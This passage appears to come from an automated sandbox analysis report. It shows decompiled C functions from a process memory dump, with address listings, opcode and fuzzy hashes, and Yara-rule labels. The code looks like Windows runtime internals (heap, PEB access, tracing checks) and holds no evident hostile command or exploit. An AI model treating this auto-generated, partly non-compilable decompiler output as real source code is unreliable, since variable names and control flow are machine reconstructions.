						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E047F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04819AE0();
						_t23 = L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                        0x04856c0a
                                                        0x04856c0f
                                                        0x04856c10
                                                        0x04856c13
                                                        0x04856c15
                                                        0x04856c19
                                                        0x04856c1c
                                                        0x04856c21
                                                        0x04856c28
                                                        0x04856c3a
                                                        0x04856c2a
                                                        0x04856c33
                                                        0x04856c33
                                                        0x04856c3f
                                                        0x04856c48
                                                        0x04856c4d
                                                        0x04856c60
                                                        0x04856c65
                                                        0x04856c69
                                                        0x04856c73
                                                        0x04856c79
                                                        0x04856c7f
                                                        0x04856c86
                                                        0x04856c90
                                                        0x04856c94
                                                        0x04856ca6
                                                        0x04856cb2
                                                        0x04856cbd
                                                        0x04856cbd
                                                        0x04856cc3
                                                        0x04856cc7
                                                        0x04856ccb
                                                        0x04856cd0
                                                        0x04856cd1
                                                        0x04856ce2
                                                        0x04856ce2
                                                        0x04856c69
                                                        0x04856ced

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d206e5edf15ce546c9b8b1ca8f45b1c672134b8cdbbc9bbbe8512f8bb1d2e976
                                                        • Instruction ID: 0d58b85edfd07ec8414db26187fee0ac98591c13114648d49463d5007965834a
                                                        • Opcode Fuzzy Hash: d206e5edf15ce546c9b8b1ca8f45b1c672134b8cdbbc9bbbe8512f8bb1d2e976
                                                        • Instruction Fuzzy Hash: FE21BAB1A00644AFD715DF68D884F6AB7B8FF48704F14056AF908DB7A1E634ED10CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048190AF, Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E048190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0482D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0480E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L047F4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0481F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0480A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                        0x048190af
                                                        0x048190b8
                                                        0x048190bb
                                                        0x048190bf
                                                        0x048190c2
                                                        0x048190c2
                                                        0x048190c8
                                                        0x048190cb
                                                        0x048190cd
                                                        0x048514d7
                                                        0x048514eb
                                                        0x048514eb
                                                        0x00000000
                                                        0x048514eb
                                                        0x048514db
                                                        0x048514e6
                                                        0x00000000
                                                        0x048514f2
                                                        0x048514e8
                                                        0x00000000
                                                        0x048514e8
                                                        0x048190d8
                                                        0x048190da
                                                        0x048190dd
                                                        0x048190e5
                                                        0x00000000
                                                        0x04819139
                                                        0x048190fa
                                                        0x048190fe
                                                        0x04819142
                                                        0x00000000
                                                        0x04819142
                                                        0x04819104
                                                        0x04819107
                                                        0x0481910b
                                                        0x04819110
                                                        0x04819118
                                                        0x04819147
                                                        0x04819148
                                                        0x0481914f
                                                        0x04819150
                                                        0x04819151
                                                        0x04819152
                                                        0x04819156
                                                        0x0481915d
                                                        0x04819160
                                                        0x04819168
                                                        0x0481916c
                                                        0x048191bc
                                                        0x048191be
                                                        0x00000000
                                                        0x048191be
                                                        0x0481916e
                                                        0x04819173
                                                        0x04819176
                                                        0x00000000
                                                        0x00000000
                                                        0x0481917c
                                                        0x04819180
                                                        0x048191b5
                                                        0x00000000
                                                        0x048191b5
                                                        0x04819182
                                                        0x04819185
                                                        0x04819189
                                                        0x00000000
                                                        0x00000000
                                                        0x0481918e
                                                        0x04819190
                                                        0x04819198
                                                        0x00000000
                                                        0x00000000
                                                        0x048191a0
                                                        0x00000000
                                                        0x048191ad
                                                        0x048191ad
                                                        0x048191b0
                                                        0x048191b1
                                                        0x00000000
                                                        0x04819185
                                                        0x0481911a
                                                        0x0481911c
                                                        0x0481911f
                                                        0x04819125
                                                        0x04819127
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                        • Instruction ID: 2e1b7504cfd1213fd91834cb0aba8161b45cdbcf6019c15939703c476d0246c9
                                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                        • Instruction Fuzzy Hash: 2B213DB1A00208EFDB20DF59C944A6AB7F8EB54354F148D6BE949E7260D374F984CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04803B7A, Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E04803B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x48c84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x48c84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x48c84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0481AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0481FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x48c84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x48c84c4; // 0x0
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                        0x04803b89
                                                        0x04803b96
                                                        0x04803ba1
                                                        0x04803bab
                                                        0x04803bb5
                                                        0x04803bb9
                                                        0x04846298
                                                        0x04803bbf
                                                        0x04803bc2
                                                        0x04803bc3
                                                        0x04803bc9
                                                        0x04803bca
                                                        0x04803bcc
                                                        0x04803bcd
                                                        0x04803bd4
                                                        0x04803bd6
                                                        0x04803bdb
                                                        0x04803bea
                                                        0x04803bf7
                                                        0x04803bfb
                                                        0x04803bff
                                                        0x04803c09
                                                        0x04803c0a
                                                        0x04803c0b
                                                        0x04803c0f
                                                        0x04803c14
                                                        0x04803c18
                                                        0x04803c18
                                                        0x04803bfb
                                                        0x04803c1b
                                                        0x04803c30
                                                        0x04803c30
                                                        0x04803c3d

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d611e5c4b18e5c94b363d63bb5bc1d9363328a0a0e4d20fd72afc43e282be6a
                                                        • Instruction ID: 7343cd99f1fdecdb0b273a84bd0afc98c34337254b37d3d6bc143a4454cfa4a2
                                                        • Opcode Fuzzy Hash: 1d611e5c4b18e5c94b363d63bb5bc1d9363328a0a0e4d20fd72afc43e282be6a
                                                        • Instruction Fuzzy Hash: 8C21CF72A00108AFD704DF58CD81B6AB7BDFB40308F150969EA08EB251D375FD11CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04856CF0, Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 80%
                                                        			E04856CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E047F7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E047F7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x47b5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0480F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0480F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04857016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L047F2400( &_v52);
								}
								_t21 = L047F2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                        0x04856cfb
                                                        0x04856d00
                                                        0x04856d02
                                                        0x04856d06
                                                        0x04856d0a
                                                        0x04856d0e
                                                        0x04856d19
                                                        0x04856d2b
                                                        0x04856d1b
                                                        0x04856d24
                                                        0x04856d24
                                                        0x04856d33
                                                        0x04856d39
                                                        0x04856d46
                                                        0x04856d4f
                                                        0x04856d61
                                                        0x04856d51
                                                        0x04856d5a
                                                        0x04856d5a
                                                        0x04856d69
                                                        0x04856d6b
                                                        0x04856d6d
                                                        0x04856d6f
                                                        0x04856d6f
                                                        0x04856d74
                                                        0x04856d79
                                                        0x04856d7a
                                                        0x04856d7f
                                                        0x04856d82
                                                        0x04856d88
                                                        0x04856d89
                                                        0x04856d90
                                                        0x04856d94
                                                        0x04856da7
                                                        0x04856db1
                                                        0x04856db1
                                                        0x04856dbb
                                                        0x04856dbb
                                                        0x04856d90
                                                        0x04856d69
                                                        0x04856d46
                                                        0x04856dc6

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 49dd21c89b173e0c32f2c8833a4a3af48cff89ee7d84a8b5bc41a244778e18f7
                                                        • Instruction ID: ad200a7e74a56f808a3694750a92bfef6458981ae6eaad96f88927e4c0093165
                                                        • Opcode Fuzzy Hash: 49dd21c89b173e0c32f2c8833a4a3af48cff89ee7d84a8b5bc41a244778e18f7
                                                        • Instruction Fuzzy Hash: C121F5725002459BE711DF28C944B67BBECAF81784F440E56FE44D7261F776E908CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A070D, Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E048A070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E048A07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0489AFDE( &_v8,  &_v12);
					E048A1293(_t38, _v28, _t60);
					if(E047F7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E048914FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                        0x048a071b
                                                        0x048a0724
                                                        0x048a0734
                                                        0x048a0738
                                                        0x048a074b
                                                        0x048a074b
                                                        0x048a0753
                                                        0x048a0753
                                                        0x048a0759
                                                        0x048a075d
                                                        0x048a0774
                                                        0x048a0779
                                                        0x048a077d
                                                        0x048a0789
                                                        0x048a0795
                                                        0x048a07a7
                                                        0x048a0797
                                                        0x048a07a0
                                                        0x048a07a0
                                                        0x048a07af
                                                        0x048a07c4
                                                        0x048a07cd
                                                        0x048a07cd
                                                        0x048a07af
                                                        0x048a07dc

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                        • Instruction ID: 5d193208a63e8b5b7ba74680ac16efb429027c5e55f8da5fcd056825214053d8
                                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                        • Instruction Fuzzy Hash: E02107362042049FE715DF18C884B6ABBE5EFC5354F048A69F955CB381DB70ED19CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047FAE73, Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E047FAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E047F7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E047F7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E047F7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E047F7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04857794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                        0x047fae78
                                                        0x047fae7c
                                                        0x047fae7e
                                                        0x047fae81
                                                        0x047fae86
                                                        0x047fae8d
                                                        0x04842691
                                                        0x047fae93
                                                        0x047fae93
                                                        0x047fae93
                                                        0x047fae98
                                                        0x047fae9d
                                                        0x048426a2
                                                        0x048426b4
                                                        0x048426a4
                                                        0x048426ad
                                                        0x048426ad
                                                        0x048426b9
                                                        0x00000000
                                                        0x048426bb
                                                        0x00000000
                                                        0x048426bb
                                                        0x047faea3
                                                        0x047faea3
                                                        0x047faea3
                                                        0x047faeaa
                                                        0x048426c0
                                                        0x048426c9
                                                        0x048426c9
                                                        0x047faeb3
                                                        0x048426d4
                                                        0x048426e1
                                                        0x00000000
                                                        0x00000000
                                                        0x048426e7
                                                        0x048426ee
                                                        0x048426f0
                                                        0x048426f9
                                                        0x048426f9
                                                        0x04842702
                                                        0x04842708
                                                        0x04842708
                                                        0x0484270b
                                                        0x0484270f
                                                        0x04842711
                                                        0x04842711
                                                        0x04842725
                                                        0x04842725
                                                        0x00000000
                                                        0x047faeb9
                                                        0x047faeb9
                                                        0x047faebf
                                                        0x047faebf
                                                        0x047faeb3

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                        • Instruction ID: a3bad5399ef0e80e28a5951ef8f0abb4b59be8b011d7b9e8279d563d4864c2cf
                                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                        • Instruction Fuzzy Hash: C921D4316056889FEB159B29CD48B2577E8EF84394F0905E1EE08CB7A2E774FC40C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04857794, Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E04857794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x48c7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0481F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E047F7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04819AE0();
					_t24 = L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                        0x04857799
                                                        0x0485779a
                                                        0x0485779b
                                                        0x048577a3
                                                        0x048577ab
                                                        0x048577ae
                                                        0x048577b1
                                                        0x048577b1
                                                        0x048577bf
                                                        0x048577c4
                                                        0x048577c8
                                                        0x048577ce
                                                        0x048577d4
                                                        0x048577e0
                                                        0x048577e0
                                                        0x048577d6
                                                        0x048577d6
                                                        0x048577de
                                                        0x00000000
                                                        0x00000000
                                                        0x048577de
                                                        0x048577e5
                                                        0x048577f0
                                                        0x048577f3
                                                        0x048577f6
                                                        0x048577fd
                                                        0x04857800
                                                        0x0485780c
                                                        0x04857818
                                                        0x0485782b
                                                        0x0485781a
                                                        0x04857823
                                                        0x04857823
                                                        0x04857830
                                                        0x04857831
                                                        0x04857838
                                                        0x0485783d
                                                        0x0485783e
                                                        0x0485784f
                                                        0x0485784f
                                                        0x0485785a

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f7431f0af145e70d804e6e517a714134e06fa0b5d2b75c728569e3b63334925
                                                        • Instruction ID: 89629ff428a6521cf4e66c2ee724e23a57eafa7bca6a89d5079a1d8ac450d8a5
                                                        • Opcode Fuzzy Hash: 0f7431f0af145e70d804e6e517a714134e06fa0b5d2b75c728569e3b63334925
                                                        • Instruction Fuzzy Hash: D3216F72500644ABC725DF69DC94E6BB7A9EF48740F104A6AEA0AD7760D634E900CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480FD9B, Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E0480FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E047E76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                        0x0480fd9b
                                                        0x0480fda0
                                                        0x0480fda1
                                                        0x0480fdab
                                                        0x0480fdad
                                                        0x0480fdb0
                                                        0x0480fdb8
                                                        0x0480fe0f
                                                        0x0480fde6
                                                        0x0480fde9
                                                        0x0480fdec
                                                        0x0484c0c0
                                                        0x0480fdfe
                                                        0x0480fe06
                                                        0x0480fe06
                                                        0x0484c0c8
                                                        0x0480fe2d
                                                        0x0480fe2d
                                                        0x00000000
                                                        0x0480fe2d
                                                        0x0484c0d1
                                                        0x0484c0e0
                                                        0x0484c0e5
                                                        0x0484c0e5
                                                        0x0484c0e8
                                                        0x00000000
                                                        0x0484c0e8
                                                        0x0480fdf4
                                                        0x00000000
                                                        0x00000000
                                                        0x0480fdf6
                                                        0x0480fdfa
                                                        0x0480fe1a
                                                        0x0480fe1f
                                                        0x0480fe1f
                                                        0x0480fdfc
                                                        0x00000000
                                                        0x0480fdfc
                                                        0x0480fdcc
                                                        0x0480fdd0
                                                        0x0480fe26
                                                        0x00000000
                                                        0x0480fe26
                                                        0x0480fdd8
                                                        0x0480fddb
                                                        0x0480fddd
                                                        0x0480fde0
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                        • Instruction ID: 921b7f3ae6d729b9fab1b8feb447cf1a63d1fcdb41c411c0a04b55de6bcc93d7
                                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                        • Instruction Fuzzy Hash: 09219A72A10A44DBD774CF09C940A62B7E5EB94B14F21CA6EEB45CB761E770BC00DB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047D9240, Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E047D9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x48af708);
				E0482D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
